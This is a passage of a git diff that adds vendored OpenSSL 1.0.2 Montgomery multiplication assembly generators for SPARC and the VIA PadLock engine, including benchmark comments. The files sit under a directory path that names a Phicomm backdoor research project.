+	fxtod	$ba,$ba
+	ldda	[%sp+$bias+$frame+4]%asi,$nb
+	fxtod	$bb,$bb
+	ldda	[%sp+$bias+$frame+2]%asi,$nc
+	fxtod	$bc,$bc
+	ldda	[%sp+$bias+$frame+0]%asi,$nd
+	fxtod	$bd,$bd
+	ldd	[$ap_l+$j],$alo		! load a[j] in double format
+	fxtod	$na,$na
+	ldd	[$ap_h+$j],$ahi
+	fxtod	$nb,$nb
+	ldd	[$np_l+$j],$nlo		! load n[j] in double format
+	fxtod	$nc,$nc
+	ldd	[$np_h+$j],$nhi
+	fxtod	$nd,$nd
+
+		fmuld	$alo,$ba,$aloa
+		fmuld	$nlo,$na,$nloa
+		fmuld	$alo,$bb,$alob
+		fmuld	$nlo,$nb,$nlob
+		fmuld	$alo,$bc,$aloc
+	faddd	$aloa,$nloa,$nloa
+		fmuld	$nlo,$nc,$nloc
+		fmuld	$alo,$bd,$alod
+	faddd	$alob,$nlob,$nlob
+		fmuld	$nlo,$nd,$nlod
+		fmuld	$ahi,$ba,$ahia
+	faddd	$aloc,$nloc,$nloc
+		fmuld	$nhi,$na,$nhia
+		fmuld	$ahi,$bb,$ahib
+	faddd	$alod,$nlod,$nlod
+		fmuld	$nhi,$nb,$nhib
+		fmuld	$ahi,$bc,$ahic
+	faddd	$ahia,$nhia,$nhia
+		fmuld	$nhi,$nc,$nhic
+		fmuld	$ahi,$bd,$ahid
+	faddd	$ahib,$nhib,$nhib
+		fmuld	$nhi,$nd,$nhid
+
+	faddd	$ahic,$nhic,$dota	! $nhic
+	faddd	$ahid,$nhid,$dotb	! $nhid
+
+	faddd	$nloc,$nhia,$nloc
+	faddd	$nlod,$nhib,$nlod
+
+	fdtox	$nloa,$nloa
+	fdtox	$nlob,$nlob
+	fdtox	$nloc,$nloc
+	fdtox	$nlod,$nlod
+
+	std	$nloa,[%sp+$bias+$frame+0]
+	std	$nlob,[%sp+$bias+$frame+8]
+	std	$nloc,[%sp+$bias+$frame+16]
+	add	$j,8,$j
+	std	$nlod,[%sp+$bias+$frame+24]
+
+	ldd	[$ap_l+$j],$alo		! load a[j] in double format
+	ldd	[$ap_h+$j],$ahi
+	ldd	[$np_l+$j],$nlo		! load n[j] in double format
+	ldd	[$np_h+$j],$nhi
+
+		fmuld	$alo,$ba,$aloa
+		fmuld	$nlo,$na,$nloa
+		fmuld	$alo,$bb,$alob
+		fmuld	$nlo,$nb,$nlob
+		fmuld	$alo,$bc,$aloc
+	ldx	[%sp+$bias+$frame+0],%o0
+		faddd	$aloa,$nloa,$nloa
+		fmuld	$nlo,$nc,$nloc
+	ldx	[%sp+$bias+$frame+8],%o1
+		fmuld	$alo,$bd,$alod
+	ldx	[%sp+$bias+$frame+16],%o2
+		faddd	$alob,$nlob,$nlob
+		fmuld	$nlo,$nd,$nlod
+	ldx	[%sp+$bias+$frame+24],%o3
+		fmuld	$ahi,$ba,$ahia
+
+	srlx	%o0,16,%o7
+		faddd	$aloc,$nloc,$nloc
+		fmuld	$nhi,$na,$nhia
+	add	%o7,%o1,%o1
+		fmuld	$ahi,$bb,$ahib
+	srlx	%o1,16,%o7
+		faddd	$alod,$nlod,$nlod
+		fmuld	$nhi,$nb,$nhib
+	add	%o7,%o2,%o2
+		fmuld	$ahi,$bc,$ahic
+	srlx	%o2,16,%o7
+		faddd	$ahia,$nhia,$nhia
+		fmuld	$nhi,$nc,$nhic
+	add	%o7,%o3,%o3		! %o3.%o2[0..15].%o1[0..15].%o0[0..15]
+	! why?
+	and	%o0,$mask,%o0
+		fmuld	$ahi,$bd,$ahid
+	and	%o1,$mask,%o1
+	and	%o2,$mask,%o2
+		faddd	$ahib,$nhib,$nhib
+		fmuld	$nhi,$nd,$nhid
+	sllx	%o1,16,%o1
+		faddd	$dota,$nloa,$nloa
+	sllx	%o2,32,%o2
+		faddd	$dotb,$nlob,$nlob
+	sllx	%o3,48,%o7
+	or	%o1,%o0,%o0
+		faddd	$ahic,$nhic,$dota	! $nhic
+	or	%o2,%o0,%o0
+		faddd	$ahid,$nhid,$dotb	! $nhid
+	or	%o7,%o0,%o0		! 64-bit result
+	ldx	[$tp],%o7
+		faddd	$nloc,$nhia,$nloc
+	addcc	%o7,%o0,%o0
+	! end-of-why?
+		faddd	$nlod,$nhib,$nlod
+	srlx	%o3,16,%g1		! 34-bit carry
+		fdtox	$nloa,$nloa
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	fdtox	$nlob,$nlob
+	fdtox	$nloc,$nloc
+	fdtox	$nlod,$nlod
+
+	std	$nloa,[%sp+$bias+$frame+0]
+	std	$nlob,[%sp+$bias+$frame+8]
+	addcc	$j,8,$j
+	std	$nloc,[%sp+$bias+$frame+16]
+	bz,pn	%icc,.Linnerskip
+	std	$nlod,[%sp+$bias+$frame+24]
+
+	ba	.Linner
+	nop
+.align	32
+.Linner:
+	ldd	[$ap_l+$j],$alo		! load a[j] in double format
+	ldd	[$ap_h+$j],$ahi
+	ldd	[$np_l+$j],$nlo		! load n[j] in double format
+	ldd	[$np_h+$j],$nhi
+
+		fmuld	$alo,$ba,$aloa
+		fmuld	$nlo,$na,$nloa
+		fmuld	$alo,$bb,$alob
+		fmuld	$nlo,$nb,$nlob
+		fmuld	$alo,$bc,$aloc
+	ldx	[%sp+$bias+$frame+0],%o0
+		faddd	$aloa,$nloa,$nloa
+		fmuld	$nlo,$nc,$nloc
+	ldx	[%sp+$bias+$frame+8],%o1
+		fmuld	$alo,$bd,$alod
+	ldx	[%sp+$bias+$frame+16],%o2
+		faddd	$alob,$nlob,$nlob
+		fmuld	$nlo,$nd,$nlod
+	ldx	[%sp+$bias+$frame+24],%o3
+		fmuld	$ahi,$ba,$ahia
+
+	srlx	%o0,16,%o7
+		faddd	$aloc,$nloc,$nloc
+		fmuld	$nhi,$na,$nhia
+	add	%o7,%o1,%o1
+		fmuld	$ahi,$bb,$ahib
+	srlx	%o1,16,%o7
+		faddd	$alod,$nlod,$nlod
+		fmuld	$nhi,$nb,$nhib
+	add	%o7,%o2,%o2
+		fmuld	$ahi,$bc,$ahic
+	srlx	%o2,16,%o7
+		faddd	$ahia,$nhia,$nhia
+		fmuld	$nhi,$nc,$nhic
+	add	%o7,%o3,%o3		! %o3.%o2[0..15].%o1[0..15].%o0[0..15]
+	and	%o0,$mask,%o0
+		fmuld	$ahi,$bd,$ahid
+	and	%o1,$mask,%o1
+	and	%o2,$mask,%o2
+		faddd	$ahib,$nhib,$nhib
+		fmuld	$nhi,$nd,$nhid
+	sllx	%o1,16,%o1
+		faddd	$dota,$nloa,$nloa
+	sllx	%o2,32,%o2
+		faddd	$dotb,$nlob,$nlob
+	sllx	%o3,48,%o7
+	or	%o1,%o0,%o0
+		faddd	$ahic,$nhic,$dota	! $nhic
+	or	%o2,%o0,%o0
+		faddd	$ahid,$nhid,$dotb	! $nhid
+	or	%o7,%o0,%o0		! 64-bit result
+		faddd	$nloc,$nhia,$nloc
+	addcc	%g1,%o0,%o0
+	ldx	[$tp+8],%o7		! tp[j]
+		faddd	$nlod,$nhib,$nlod
+	srlx	%o3,16,%g1		! 34-bit carry
+		fdtox	$nloa,$nloa
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+		fdtox	$nlob,$nlob
+	addcc	%o7,%o0,%o0
+		fdtox	$nloc,$nloc
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	stx	%o0,[$tp]		! tp[j-1]
+		fdtox	$nlod,$nlod
+
+	std	$nloa,[%sp+$bias+$frame+0]
+	std	$nlob,[%sp+$bias+$frame+8]
+	std	$nloc,[%sp+$bias+$frame+16]
+	addcc	$j,8,$j
+	std	$nlod,[%sp+$bias+$frame+24]
+	bnz,pt	%icc,.Linner
+	add	$tp,8,$tp
+
+.Linnerskip:
+	fdtox	$dota,$dota
+	fdtox	$dotb,$dotb
+
+	ldx	[%sp+$bias+$frame+0],%o0
+	ldx	[%sp+$bias+$frame+8],%o1
+	ldx	[%sp+$bias+$frame+16],%o2
+	ldx	[%sp+$bias+$frame+24],%o3
+
+	srlx	%o0,16,%o7
+	std	$dota,[%sp+$bias+$frame+32]
+	add	%o7,%o1,%o1
+	std	$dotb,[%sp+$bias+$frame+40]
+	srlx	%o1,16,%o7
+	add	%o7,%o2,%o2
+	srlx	%o2,16,%o7
+	add	%o7,%o3,%o3		! %o3.%o2[0..15].%o1[0..15].%o0[0..15]
+	and	%o0,$mask,%o0
+	and	%o1,$mask,%o1
+	and	%o2,$mask,%o2
+	sllx	%o1,16,%o1
+	sllx	%o2,32,%o2
+	sllx	%o3,48,%o7
+	or	%o1,%o0,%o0
+	or	%o2,%o0,%o0
+	ldx	[%sp+$bias+$frame+32],%o4
+	or	%o7,%o0,%o0		! 64-bit result
+	ldx	[%sp+$bias+$frame+40],%o5
+	addcc	%g1,%o0,%o0
+	ldx	[$tp+8],%o7		! tp[j]
+	srlx	%o3,16,%g1		! 34-bit carry
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	addcc	%o7,%o0,%o0
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	stx	%o0,[$tp]		! tp[j-1]
+	add	$tp,8,$tp
+
+	srlx	%o4,16,%o7
+	add	%o7,%o5,%o5
+	and	%o4,$mask,%o4
+	sllx	%o5,16,%o7
+	or	%o7,%o4,%o4
+	addcc	%g1,%o4,%o4
+	srlx	%o5,48,%g1
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	addcc	$carry,%o4,%o4
+	stx	%o4,[$tp]		! tp[num-1]
+	mov	%g1,$carry
+	bcs,a	%xcc,.+8
+	add	$carry,1,$carry
+
+	addcc	$i,8,$i
+	bnz	%icc,.Louter
+	nop
+
+	add	$tp,8,$tp		! adjust tp to point at the end
+	orn	%g0,%g0,%g4
+	sub	%g0,$num,%o7		! n=-num
+	ba	.Lsub
+	subcc	%g0,%g0,%g0		! clear %icc.c
+
+.align	32
+.Lsub:
+	ldx	[$tp+%o7],%o0
+	add	$np,%o7,%g1
+	ld	[%g1+0],%o2
+	ld	[%g1+4],%o3
+	srlx	%o0,32,%o1
+	subccc	%o0,%o2,%o2
+	add	$rp,%o7,%g1
+	subccc	%o1,%o3,%o3
+	st	%o2,[%g1+0]
+	add	%o7,8,%o7
+	brnz,pt	%o7,.Lsub
+	st	%o3,[%g1+4]
+	subc	$carry,0,%g4
+	sub	%g0,$num,%o7		! n=-num
+	ba	.Lcopy
+	nop
+
+.align	32
+.Lcopy:
+	ldx	[$tp+%o7],%o0
+	add	$rp,%o7,%g1
+	ld	[%g1+0],%o2
+	ld	[%g1+4],%o3
+	stx	%g0,[$tp+%o7]
+	and	%o0,%g4,%o0
+	srlx	%o0,32,%o1
+	andn	%o2,%g4,%o2
+	andn	%o3,%g4,%o3
+	or	%o2,%o0,%o0
+	or	%o3,%o1,%o1
+	st	%o0,[%g1+0]
+	add	%o7,8,%o7
+	brnz,pt	%o7,.Lcopy
+	st	%o1,[%g1+4]
+	sub	%g0,$num,%o7		! n=-num
+
+.Lzap:
+	stx	%g0,[$ap_l+%o7]
+	stx	%g0,[$ap_h+%o7]
+	stx	%g0,[$np_l+%o7]
+	stx	%g0,[$np_h+%o7]
+	add	%o7,8,%o7
+	brnz,pt	%o7,.Lzap
+	nop
+
+	ldx	[%sp+$bias+$frame+48],%o7
+	wr	%g0,%o7,%asi		! restore %asi
+
+	mov	1,%i0
+.Lret:
+	ret
+	restore
+.type   $fname,#function
+.size	$fname,(.-$fname)
+.asciz	"Montgomery Multipltication for UltraSPARC, CRYPTOGAMS by <appro\@openssl.org>"
+.align	32
+___
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+# Below substitution makes it possible to compile without demanding
+# VIS extentions on command line, e.g. -xarch=v9 vs. -xarch=v9a. I
+# dare to do this, because VIS capability is detected at run-time now
+# and this routine is not called on CPU not capable to execute it. Do
+# note that fzeros is not the only VIS dependency! Another dependency
+# is implicit and is just _a_ numerical value loaded to %asi register,
+# which assembler can't recognize as VIS specific...
+$code =~ s/fzeros\s+%f([0-9]+)/
+	   sprintf(".word\t0x%x\t! fzeros %%f%d",0x81b00c20|($1<<25),$1)
+	  /gem;
+
+print $code;
+# flush
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/via-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/via-mont.pl
new file mode 100644
index 0000000..c046a51
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/via-mont.pl
@@ -0,0 +1,242 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# Wrapper around 'rep montmul', VIA-specific instruction accessing
+# PadLock Montgomery Multiplier. The wrapper is designed as drop-in
+# replacement for OpenSSL bn_mul_mont [first implemented in 0.9.9].
+#
+# Below are interleaved outputs from 'openssl speed rsa dsa' for 4
+# different software configurations on 1.5GHz VIA Esther processor.
+# Lines marked with "software integer" denote performance of hand-
+# coded integer-only assembler found in OpenSSL 0.9.7. "Software SSE2"
+# refers to hand-coded SSE2 Montgomery multiplication procedure found
+# OpenSSL 0.9.9. "Hardware VIA SDK" refers to padlock_pmm routine from
+# Padlock SDK 2.0.1 available for download from VIA, which naturally
+# utilizes the magic 'repz montmul' instruction. And finally "hardware
+# this" refers to *this* implementation which also uses 'repz montmul'
+#
+#                   sign    verify    sign/s verify/s
+# rsa  512 bits 0.001720s 0.000140s    581.4   7149.7	software integer
+# rsa  512 bits 0.000690s 0.000086s   1450.3  11606.0	software SSE2
+# rsa  512 bits 0.006136s 0.000201s    163.0   4974.5	hardware VIA SDK
+# rsa  512 bits 0.000712s 0.000050s   1404.9  19858.5	hardware this
+#
+# rsa 1024 bits 0.008518s 0.000413s    117.4   2420.8	software integer
+# rsa 1024 bits 0.004275s 0.000277s    233.9   3609.7	software SSE2
+# rsa 1024 bits 0.012136s 0.000260s     82.4   3844.5	hardware VIA SDK
+# rsa 1024 bits 0.002522s 0.000116s    396.5   8650.9	hardware this
+#
+# rsa 2048 bits 0.050101s 0.001371s     20.0    729.6	software integer
+# rsa 2048 bits 0.030273s 0.001008s     33.0    991.9	software SSE2
+# rsa 2048 bits 0.030833s 0.000976s     32.4   1025.1	hardware VIA SDK
+# rsa 2048 bits 0.011879s 0.000342s     84.2   2921.7	hardware this
+#
+# rsa 4096 bits 0.327097s 0.004859s      3.1    205.8	software integer
+# rsa 4096 bits 0.229318s 0.003859s      4.4    259.2	software SSE2
+# rsa 4096 bits 0.233953s 0.003274s      4.3    305.4	hardware VIA SDK
+# rsa 4096 bits 0.070493s 0.001166s     14.2    857.6	hardware this
+#
+# dsa  512 bits 0.001342s 0.001651s    745.2    605.7	software integer
+# dsa  512 bits 0.000844s 0.000987s   1185.3   1013.1	software SSE2
+# dsa  512 bits 0.001902s 0.002247s    525.6    444.9	hardware VIA SDK
+# dsa  512 bits 0.000458s 0.000524s   2182.2   1909.1	hardware this
+#
+# dsa 1024 bits 0.003964s 0.004926s    252.3    203.0	software integer
+# dsa 1024 bits 0.002686s 0.003166s    372.3    315.8	software SSE2
+# dsa 1024 bits 0.002397s 0.002823s    417.1    354.3	hardware VIA SDK
+# dsa 1024 bits 0.000978s 0.001170s   1022.2    855.0	hardware this
+#
+# dsa 2048 bits 0.013280s 0.016518s     75.3     60.5	software integer
+# dsa 2048 bits 0.009911s 0.011522s    100.9     86.8	software SSE2
+# dsa 2048 bits 0.009542s 0.011763s    104.8     85.0	hardware VIA SDK
+# dsa 2048 bits 0.002884s 0.003352s    346.8    298.3	hardware this
+#
+# To give you some other reference point here is output for 2.4GHz P4
+# running hand-coded SSE2 bn_mul_mont found in 0.9.9, i.e. "software
+# SSE2" in above terms.
+#
+# rsa  512 bits 0.000407s 0.000047s   2454.2  21137.0
+# rsa 1024 bits 0.002426s 0.000141s    412.1   7100.0
+# rsa 2048 bits 0.015046s 0.000491s     66.5   2034.9
+# rsa 4096 bits 0.109770s 0.002379s      9.1    420.3
+# dsa  512 bits 0.000438s 0.000525s   2281.1   1904.1
+# dsa 1024 bits 0.001346s 0.001595s    742.7    627.0
+# dsa 2048 bits 0.004745s 0.005582s    210.7    179.1
+#
+# Conclusions: 
+# - VIA SDK leaves a *lot* of room for improvement (which this
+#   implementation successfully fills:-);
+# - 'rep montmul' gives up to >3x performance improvement depending on
+#   key length;
+# - in terms of absolute performance it delivers approximately as much
+#   as modern out-of-order 32-bit cores [again, for longer keys].
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"via-mont.pl");
+
+# int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp, const BN_ULONG *np,const BN_ULONG *n0, int num);
+$func="bn_mul_mont_padlock";
+
+$pad=16*1;	# amount of reserved bytes on top of every vector
+
+# stack layout
+$mZeroPrime=&DWP(0,"esp");		# these are specified by VIA
+$A=&DWP(4,"esp");
+$B=&DWP(8,"esp");
+$T=&DWP(12,"esp");
+$M=&DWP(16,"esp");
+$scratch=&DWP(20,"esp");
+$rp=&DWP(24,"esp");			# these are mine
+$sp=&DWP(28,"esp");
+# &DWP(32,"esp")			# 32 byte scratch area
+# &DWP(64+(4*$num+$pad)*0,"esp")	# padded tp[num]
+# &DWP(64+(4*$num+$pad)*1,"esp")	# padded copy of ap[num]
+# &DWP(64+(4*$num+$pad)*2,"esp")	# padded copy of bp[num]
+# &DWP(64+(4*$num+$pad)*3,"esp")	# padded copy of np[num]
+# Note that SDK suggests to unconditionally allocate 2K per vector. This
+# has quite an impact on performance. It naturally depends on key length,
+# but to give an example 1024 bit private RSA key operations suffer >30%
+# penalty. I allocate only as much as actually required...
+
+&function_begin($func);
+	&xor	("eax","eax");
+	&mov	("ecx",&wparam(5));	# num
+	# meet VIA's limitations for num [note that the specification
+	# expresses them in bits, while we work with amount of 32-bit words]
+	&test	("ecx",3);
+	&jnz	(&label("leave"));	# num % 4 != 0
+	&cmp	("ecx",8);
+	&jb	(&label("leave"));	# num < 8
+	&cmp	("ecx",1024);
+	&ja	(&label("leave"));	# num > 1024
+
+	&pushf	();
+	&cld	();
+
+	&mov	("edi",&wparam(0));	# rp
+	&mov	("eax",&wparam(1));	# ap
+	&mov	("ebx",&wparam(2));	# bp
+	&mov	("edx",&wparam(3));	# np
+	&mov	("esi",&wparam(4));	# n0
+	&mov	("esi",&DWP(0,"esi"));	# *n0
+
+	&lea	("ecx",&DWP($pad,"","ecx",4));	# ecx becomes vector size in bytes
+	&lea	("ebp",&DWP(64,"","ecx",4));	# allocate 4 vectors + 64 bytes
+	&neg	("ebp");
+	&add	("ebp","esp");
+	&and	("ebp",-64);		# align to cache-line
+	&xchg	("ebp","esp");		# alloca
+
+	&mov	($rp,"edi");		# save rp
+	&mov	($sp,"ebp");		# save esp
+
+	&mov	($mZeroPrime,"esi");
+	&lea	("esi",&DWP(64,"esp"));	# tp
+	&mov	($T,"esi");
+	&lea	("edi",&DWP(32,"esp"));	# scratch area
+	&mov	($scratch,"edi");
+	&mov	("esi","eax");
+
+	&lea	("ebp",&DWP(-$pad,"ecx"));
+	&shr	("ebp",2);		# restore original num value in ebp
+
+	&xor	("eax","eax");
+
+	&mov	("ecx","ebp");
+	&lea	("ecx",&DWP((32+$pad)/4,"ecx"));# padded tp + scratch
+	&data_byte(0xf3,0xab);		# rep stosl, bzero
+
+	&mov	("ecx","ebp");
+	&lea	("edi",&DWP(64+$pad,"esp","ecx",4));# pointer to ap copy
+	&mov	($A,"edi");
+	&data_byte(0xf3,0xa5);		# rep movsl, memcpy
+	&mov	("ecx",$pad/4);
+	&data_byte(0xf3,0xab);		# rep stosl, bzero pad
+	# edi points at the end of padded ap copy...
+
+	&mov	("ecx","ebp");
+	&mov	("esi","ebx");
+	&mov	($B,"edi");
+	&data_byte(0xf3,0xa5);		# rep movsl, memcpy
+	&mov	("ecx",$pad/4);
+	&data_byte(0xf3,0xab);		# rep stosl, bzero pad
+	# edi points at the end of padded bp copy...
+
+	&mov	("ecx","ebp");
+	&mov	("esi","edx");
+	&mov	($M,"edi");
+	&data_byte(0xf3,0xa5);		# rep movsl, memcpy
+	&mov	("ecx",$pad/4);
+	&data_byte(0xf3,0xab);		# rep stosl, bzero pad
+	# edi points at the end of padded np copy...
+
+	# let magic happen...
+	&mov	("ecx","ebp");
+	&mov	("esi","esp");
+	&shl	("ecx",5);		# convert word counter to bit counter
+	&align	(4);
+	&data_byte(0xf3,0x0f,0xa6,0xc0);# rep montmul
+
+	&mov	("ecx","ebp");
+	&lea	("esi",&DWP(64,"esp"));		# tp
+	# edi still points at the end of padded np copy...
+	&neg	("ebp");
+	&lea	("ebp",&DWP(-$pad,"edi","ebp",4));	# so just "rewind"
+	&mov	("edi",$rp);			# restore rp
+	&xor	("edx","edx");			# i=0 and clear CF
+
+&set_label("sub",8);
+	&mov	("eax",&DWP(0,"esi","edx",4));
+	&sbb	("eax",&DWP(0,"ebp","edx",4));
+	&mov	(&DWP(0,"edi","edx",4),"eax");	# rp[i]=tp[i]-np[i]
+	&lea	("edx",&DWP(1,"edx"));		# i++
+	&loop	(&label("sub"));		# doesn't affect CF!
+
+	&mov	("eax",&DWP(0,"esi","edx",4));	# upmost overflow bit
+	&sbb	("eax",0);
+	&and	("esi","eax");
+	&not	("eax");
+	&mov	("ebp","edi");
+	&and	("ebp","eax");
+	&or	("esi","ebp");			# tp=carry?tp:rp
+
+	&mov	("ecx","edx");			# num
+	&xor	("edx","edx");			# i=0
+
+&set_label("copy",8);
+	&mov	("eax",&DWP(0,"esi","edx",4));
+	&mov	(&DWP(64,"esp","edx",4),"ecx");	# zap tp
+	&mov	(&DWP(0,"edi","edx",4),"eax");
+	&lea	("edx",&DWP(1,"edx"));		# i++
+	&loop	(&label("copy"));
+
+	&mov	("ebp",$sp);
+	&xor	("eax","eax");
+
+	&mov	("ecx",64/4);
+	&mov	("edi","esp");		# zap frame including scratch area
+	&data_byte(0xf3,0xab);		# rep stosl, bzero
+
+	# zap copies of ap, bp and np
+	&lea	("edi",&DWP(64+$pad,"esp","edx",4));# pointer to ap
+	&lea	("ecx",&DWP(3*$pad/4,"edx","edx",2));
+	&data_byte(0xf3,0xab);		# rep stosl, bzero
+
+	&mov	("esp","ebp");
+	&inc	("eax");		# signal "done"
+	&popf	();
+&set_label("leave");
+&function_end($func);
+
+&asciz("Padlock Montgomery Multiplication, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/vis3-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/vis3-mont.pl
new file mode 100644
index 0000000..a1357de
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/vis3-mont.pl
@@ -0,0 +1,373 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# October 2012.
+#
+# SPARCv9 VIS3 Montgomery multiplicaion procedure suitable for T3 and
+# onward. There are three new instructions used here: umulxhi,
+# addxc[cc] and initializing store. On T3 RSA private key operations
+# are 1.54/1.87/2.11/2.26 times faster for 512/1024/2048/4096-bit key
+# lengths. This is without dedicated squaring procedure. On T4
+# corresponding coefficients are 1.47/2.10/2.80/2.90x, which is mostly
+# for reference purposes, because T4 has dedicated Montgomery
+# multiplication and squaring *instructions* that deliver even more.
+
+$bits=32;
+for (@ARGV)     { $bits=64 if (/\-m64/ || /\-xarch\=v9/); }
+if ($bits==64)  { $bias=2047; $frame=192; }
+else            { $bias=0;    $frame=112; }
+
+$code.=<<___ if ($bits==64);
+.register	%g2,#scratch
+.register	%g3,#scratch
+___
+$code.=<<___;
+.section	".text",#alloc,#execinstr
+___
+
+($n0,$m0,$m1,$lo0,$hi0, $lo1,$hi1,$aj,$alo,$nj,$nlo,$tj)=
+	(map("%g$_",(1..5)),map("%o$_",(0..5,7)));
+
+# int bn_mul_mont(
+$rp="%o0";	# BN_ULONG *rp,
+$ap="%o1";	# const BN_ULONG *ap,
+$bp="%o2";	# const BN_ULONG *bp,
+$np="%o3";	# const BN_ULONG *np,
+$n0p="%o4";	# const BN_ULONG *n0,
+$num="%o5";	# int num);	# caller ensures that num is even
+				# and >=6
+$code.=<<___;
+.globl	bn_mul_mont_vis3
+.align	32
+bn_mul_mont_vis3:
+	add	%sp,	$bias,	%g4	! real top of stack
+	sll	$num,	2,	$num	! size in bytes
+	add	$num,	63,	%g5
+	andn	%g5,	63,	%g5	! buffer size rounded up to 64 bytes
+	add	%g5,	%g5,	%g1
+	add	%g5,	%g1,	%g1	! 3*buffer size
+	sub	%g4,	%g1,	%g1
+	andn	%g1,	63,	%g1	! align at 64 byte
+	sub	%g1,	$frame,	%g1	! new top of stack
+	sub	%g1,	%g4,	%g1
+
+	save	%sp,	%g1,	%sp
+___
+
+#	+-------------------------------+<-----	%sp
+#	.				.
+#	+-------------------------------+<-----	aligned at 64 bytes
+#	| __int64 tmp[0]		|
+#	+-------------------------------+
+#	.				.
+#	.				.
+#	+-------------------------------+<----- aligned at 64 bytes
+#	| __int64 ap[1..0]		|	converted ap[]
+#	+-------------------------------+
+#	| __int64 np[1..0]		|	converted np[]
+#	+-------------------------------+
+#	| __int64 ap[3..2]		|
+#	.				.
+#	.				.
+#	+-------------------------------+
+($rp,$ap,$bp,$np,$n0p,$num)=map("%i$_",(0..5));
+($t0,$t1,$t2,$t3,$cnt,$tp,$bufsz,$anp)=map("%l$_",(0..7));
+($ovf,$i)=($t0,$t1);
+$code.=<<___;
+	ld	[$n0p+0],	$t0	! pull n0[0..1] value
+	add	%sp, $bias+$frame, $tp
+	ld	[$n0p+4],	$t1
+	add	$tp,	%g5,	$anp
+	ld	[$bp+0],	$t2	! m0=bp[0]
+	sllx	$t1,	32,	$n0
+	ld	[$bp+4],	$t3
+	or	$t0,	$n0,	$n0
+	add	$bp,	8,	$bp
+
+	ld	[$ap+0],	$t0	! ap[0]
+	sllx	$t3,	32,	$m0
+	ld	[$ap+4],	$t1
+	or	$t2,	$m0,	$m0
+
+	ld	[$ap+8],	$t2	! ap[1]
+	sllx	$t1,	32,	$aj
+	ld	[$ap+12],	$t3
+	or	$t0,	$aj,	$aj
+	add	$ap,	16,	$ap
+	stxa	$aj,	[$anp]0xe2	! converted ap[0]
+
+	mulx	$aj,	$m0,	$lo0	! ap[0]*bp[0]
+	umulxhi	$aj,	$m0,	$hi0
+
+	ld	[$np+0],	$t0	! np[0]
+	sllx	$t3,	32,	$aj
+	ld	[$np+4],	$t1
+	or	$t2,	$aj,	$aj
+
+	ld	[$np+8],	$t2	! np[1]
+	sllx	$t1,	32,	$nj
+	ld	[$np+12],	$t3
+	or	$t0, $nj,	$nj
+	add	$np,	16,	$np
+	stx	$nj,	[$anp+8]	! converted np[0]
+
+	mulx	$lo0,	$n0,	$m1	! "tp[0]"*n0
+	stx	$aj,	[$anp+16]	! converted ap[1]
+
+	mulx	$aj,	$m0,	$alo	! ap[1]*bp[0]
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+
+	mulx	$nj,	$m1,	$lo1	! np[0]*m1
+	umulxhi	$nj,	$m1,	$hi1
+
+	sllx	$t3,	32,	$nj
+	or	$t2,	$nj,	$nj
+	stx	$nj,	[$anp+24]	! converted np[1]
+	add	$anp,	32,	$anp
+
+	addcc	$lo0,	$lo1,	$lo1
+	addxc	%g0,	$hi1,	$hi1
+
+	mulx	$nj,	$m1,	$nlo	! np[1]*m1
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+
+	ba	.L1st
+	sub	$num,	24,	$cnt	! cnt=num-3
+
+.align	16
+.L1st:
+	ld	[$ap+0],	$t0	! ap[j]
+	addcc	$alo,	$hi0,	$lo0
+	ld	[$ap+4],	$t1
+	addxc	$aj,	%g0,	$hi0
+
+	sllx	$t1,	32,	$aj
+	add	$ap,	8,	$ap
+	or	$t0,	$aj,	$aj
+	stxa	$aj,	[$anp]0xe2	! converted ap[j]
+
+	ld	[$np+0],	$t2	! np[j]
+	addcc	$nlo,	$hi1,	$lo1
+	ld	[$np+4],	$t3
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+
+	sllx	$t3,	32,	$nj
+	add	$np,	8,	$np
+	mulx	$aj,	$m0,	$alo	! ap[j]*bp[0]
+	or	$t2,	$nj,	$nj
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	stx	$nj,	[$anp+8]	! converted np[j]
+	add	$anp,	16,	$anp	! anp++
+
+	mulx	$nj,	$m1,	$nlo	! np[j]*m1
+	addcc	$lo0,	$lo1,	$lo1	! np[j]*m1+ap[j]*bp[0]
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+	addxc	%g0,	$hi1,	$hi1
+	stxa	$lo1,	[$tp]0xe2	! tp[j-1]
+	add	$tp,	8,	$tp	! tp++
+
+	brnz,pt	$cnt,	.L1st
+	sub	$cnt,	8,	$cnt	! j--
+!.L1st
+	addcc	$alo,	$hi0,	$lo0
